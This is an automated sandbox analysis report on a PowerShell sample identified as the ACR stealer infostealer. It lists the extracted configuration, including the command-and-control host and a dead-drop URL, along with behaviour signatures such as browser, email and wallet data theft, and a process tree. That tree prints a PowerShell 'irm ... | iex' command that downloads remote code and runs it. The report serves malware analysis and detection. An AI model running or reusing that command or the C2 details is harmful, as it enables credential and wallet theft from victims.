Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260911-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260911-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    16/09/2026, 12:18

General

  • Target
    475333927k.ps1
  • Size 93KB
  • Sample260916-pg3bzazerg
  • SHA256 61c24b0138c0b68dc54b2d8667ce6a37c6857aff443fca11d4aa39c3332518a3
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Extracted

Family
  • acrstealer

Version
  • 4.3.10-alpha1

C2
  • logs.primebyte.cc

Decoy
  • cloudflare.com

Attributes
  • ddrs

    https://telegra.ph/Built-in-Types-08-01

  • guids

    f1575b64-8492-4e8b-b102-4d26e8c70371

    019fd851-d0e2-7805-ae09-2dd1daa78960

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.2.6187.130 Safari/537.36

xor.hex

Signatures

  • Family: ACR stealer,GrMsk

    ACR stealer (aka GrMsk stealer) is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Badlisted process makes network request 6 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Contacts third-party web service commonly abused for C2 1 TTPs 1 IoCs

    Legitimate web (hosting) services can be abused by malware authors to host malware or C2s.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Time Discovery 1 TTPs 2 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

  • Checks processor information in registry 2 TTPs 19 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 10 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\explorer.exe
    explorer.exe /LOADSAVEDWINDOWS
    1⤵
      PID:4624
      • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
        powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\475333927k.ps1
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5012
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3mj0eenm\3mj0eenm.cmdline"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4372
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3B4A.tmp" "c:\Users\Admin\AppData\Local\Temp\3mj0eenm\CSCFF19331358D449A78D6C9E33697BC36A.TMP"
            4⤵
              PID:3340
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dciirb3m\dciirb3m.cmdline"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5776
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES550C.tmp" "c:\Users\Admin\AppData\Local\Temp\dciirb3m\CSC39E6696EE82949AB8030A53B65CD2D9.TMP"
              4⤵
                PID:3640
            • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -Command [Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12; irm https://rawcdn.githack.com/19875567137/465636664593hfgd/refs/heads/main/dfsgh64537-87 | iex
              3⤵
              • Badlisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3336
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\SysWOW64\rundll32.exe"
                4⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Badlisted process makes network request
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:5136
                • C:\Windows\SysWOW64\dllhost.exe
                  "C:\Windows\SysWOW64\dllhost.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2636
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-first-run --no-default-browser-check
            2⤵
            • Enumerates system info in registry
            • Modifies data under HKEY_USERS
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:3752
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=140.0.7339.81 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffe63bec728,0x7ffe63bec734,0x7ffe63bec740
              3⤵
                PID:4664
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-pre-read-main-dll --force-high-res-timeticks=disabled --gpu-preferences=SAAAAAAAAADgAAAIAAAAAAAAAAAAAGAAAQAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --metrics-shmem-handle=1640,i,16497219380905927814,17383166388922434791,262144 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=1932 /prefetch:2
                3⤵
                  PID:4780
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --force-high-res-timeticks=disabled --metrics-shmem-handle=1432,i,2580257557147954730,10940789517124627359,524288 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:11
                  3⤵
                  • System Time Discovery
                  PID:5388
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --force-high-res-timeticks=disabled --metrics-shmem-handle=2320,i,3566627466880562192,15986807018335270861,524288 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=2332 /prefetch:13
                  3⤵
                    PID:3460
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --metrics-shmem-handle=3208,i,7706700496309759225,12815624229790142732,2097152 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=3276 /prefetch:1
                    3⤵
                      PID:3184
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --metrics-shmem-handle=3212,i,15629818953923913162,11606414804901971053,2097152 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=3296 /prefetch:1
                      3⤵
                        PID:4604
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --metrics-shmem-handle=4492,i,16769963613775723123,13108940167299488451,2097152 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=4496 /prefetch:1
                        3⤵
                          PID:4568
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --force-high-res-timeticks=disabled --metrics-shmem-handle=4616,i,11545877995605859605,16222874066704354146,524288 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=4640 /prefetch:14
                          3⤵
                            PID:5064
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --force-high-res-timeticks=disabled --metrics-shmem-handle=5264,i,1756776687919905644,11188252370596696844,524288 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=5276 /prefetch:14
                            3⤵
                              PID:252
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --metrics-shmem-handle=5396,i,7008878309248329727,898871875010093097,2097152 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=5416 /prefetch:1
                              3⤵
                                PID:4692
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --metrics-shmem-handle=5372,i,15171571522766664179,3244773144793955668,2097152 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:1
                                3⤵
                                  PID:2348
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --metrics-shmem-handle=5664,i,13178093098620407293,7479954556462692987,2097152 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=5380 /prefetch:1
                                  3⤵
                                    PID:5300
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --force-high-res-timeticks=disabled --metrics-shmem-handle=5724,i,638232897636346785,13647398499966510383,524288 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=5440 /prefetch:14
                                    3⤵
                                      PID:5912
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --metrics-shmem-handle=5448,i,16791805807671202559,12724183310916654689,2097152 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:1
                                      3⤵
                                        PID:2960
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --metrics-shmem-handle=6088,i,11457254842511622790,10596757806699255787,2097152 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=5836 /prefetch:1
                                        3⤵
                                          PID:2308
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --metrics-shmem-handle=5416,i,13628157785841809467,16919121843895851115,2097152 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=5884 /prefetch:1
                                          3⤵
                                            PID:1272
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --metrics-shmem-handle=5920,i,408207754219752405,14906097230059240398,2097152 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=5836 /prefetch:1
                                            3⤵
                                              PID:5812
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --metrics-shmem-handle=5356,i,13951010507498589202,11195722435089086796,2097152 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=5444 /prefetch:1
                                              3⤵
                                                PID:932
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --force-high-res-timeticks=disabled --metrics-shmem-handle=5452,i,3244194219356076919,6628893310901543508,524288 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=5852 /prefetch:14
                                                3⤵
                                                  PID:2684
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --force-high-res-timeticks=disabled --metrics-shmem-handle=5460,i,14664283453883688087,16042069065235370893,524288 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:14
                                                  3⤵
                                                    PID:1240
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --metrics-shmem-handle=5380,i,13399320951004666780,2514024342665536584,2097152 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=5496 /prefetch:1
                                                    3⤵
                                                      PID:4628
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-dinosaur-easter-egg-alt-images --force-high-res-timeticks=disabled --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --metrics-shmem-handle=6068,i,17701840792527909918,10938634855506445581,2097152 --field-trial-handle=1936,i,3067920862649106067,13582313575516579712,262144 --variations-seed-version --mojo-platform-channel-handle=5628 /prefetch:9
                                                      3⤵
                                                        PID:5672
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-first-run --no-default-browser-check
                                                      2⤵
                                                      • Enumerates system info in registry
                                                      • Modifies data under HKEY_USERS
                                                      • Modifies registry class
                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2948
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=139.0.7258.155 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=139.0.3405.125 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x368,0x7ffe5b0ec188,0x7ffe5b0ec194,0x7ffe5b0ec1a0
                                                        3⤵
                                                          PID:4700
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-pre-read-main-dll --force-high-res-timeticks=disabled --gpu-preferences=SAAAAAAAAADgAAAIAAAAAAAAAAAAAGAAAQAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --always-read-main-dll --metrics-shmem-handle=1684,i,16392240258216094259,8381781650776320719,262144 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=2772 /prefetch:2
                                                          3⤵
                                                            PID:1156
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --force-high-res-timeticks=disabled --always-read-main-dll --metrics-shmem-handle=1888,i,8318866413845499353,2992147254650255067,524288 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=2836 /prefetch:11
                                                            3⤵
                                                            • System Time Discovery
                                                            PID:4656
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --force-high-res-timeticks=disabled --always-read-main-dll --metrics-shmem-handle=2008,i,13254662170241781753,7401819288615575653,524288 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=3016 /prefetch:13
                                                            3⤵
                                                              PID:6008
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --force-high-res-timeticks=disabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --metrics-shmem-handle=3584,i,16515711896630492443,16325652721848574450,2097152 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
                                                              3⤵
                                                                PID:6120
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --pdf-upsell-enabled --force-high-res-timeticks=disabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --metrics-shmem-handle=3620,i,17497310225010139643,5096562516414981717,2097152 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=3428 /prefetch:1
                                                                3⤵
                                                                  PID:1608
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --force-high-res-timeticks=disabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --metrics-shmem-handle=4168,i,13115237751987964059,1516241349983644605,2097152 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=4284 /prefetch:1
                                                                  3⤵
                                                                    PID:5160
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --pdf-upsell-enabled --force-high-res-timeticks=disabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --metrics-shmem-handle=4220,i,1933884866710669761,5648799175538822228,2097152 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=4468 /prefetch:9
                                                                    3⤵
                                                                      PID:124
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --force-high-res-timeticks=disabled --always-read-main-dll --metrics-shmem-handle=5208,i,6819557371501421194,13550710764335647158,524288 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=5228 /prefetch:14
                                                                      3⤵
                                                                        PID:2736
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --force-high-res-timeticks=disabled --always-read-main-dll --metrics-shmem-handle=5368,i,8206233143281887552,5609006673255151057,524288 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=5248 /prefetch:14
                                                                        3⤵
                                                                          PID:1472
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --force-high-res-timeticks=disabled --always-read-main-dll --metrics-shmem-handle=5408,i,9006039007280125109,7621890974069849382,524288 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:14
                                                                          3⤵
                                                                            PID:2156
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\139.0.3405.125\identity_helper.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\139.0.3405.125\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --force-high-res-timeticks=disabled --always-read-main-dll --metrics-shmem-handle=6304,i,11386057902843921714,8581814801382925293,524288 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=6276 /prefetch:14
                                                                            3⤵
                                                                              PID:3164
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\139.0.3405.125\identity_helper.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\139.0.3405.125\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --force-high-res-timeticks=disabled --always-read-main-dll --metrics-shmem-handle=6304,i,11386057902843921714,8581814801382925293,524288 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=6276 /prefetch:14
                                                                              3⤵
                                                                                PID:932
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --force-high-res-timeticks=disabled --always-read-main-dll --metrics-shmem-handle=6560,i,3699925649320605547,16722618069806372943,524288 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=6576 /prefetch:14
                                                                                3⤵
                                                                                  PID:4360
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --force-high-res-timeticks=disabled --always-read-main-dll --metrics-shmem-handle=6868,i,17727995751377955806,12042251523560025871,524288 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=6896 /prefetch:14
                                                                                  3⤵
                                                                                    PID:5500
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --force-high-res-timeticks=disabled --always-read-main-dll --metrics-shmem-handle=6172,i,14808695227704948118,3471047215411389524,524288 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=6372 /prefetch:14
                                                                                    3⤵
                                                                                      PID:2320
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --force-high-res-timeticks=disabled --always-read-main-dll --metrics-shmem-handle=6304,i,14383357943964336058,3442101270105596695,524288 --field-trial-handle=2780,i,15035402582461697475,5022671543131055017,262144 --variations-seed-version --mojo-platform-channel-handle=6336 /prefetch:14
                                                                                      3⤵
                                                                                        PID:3520
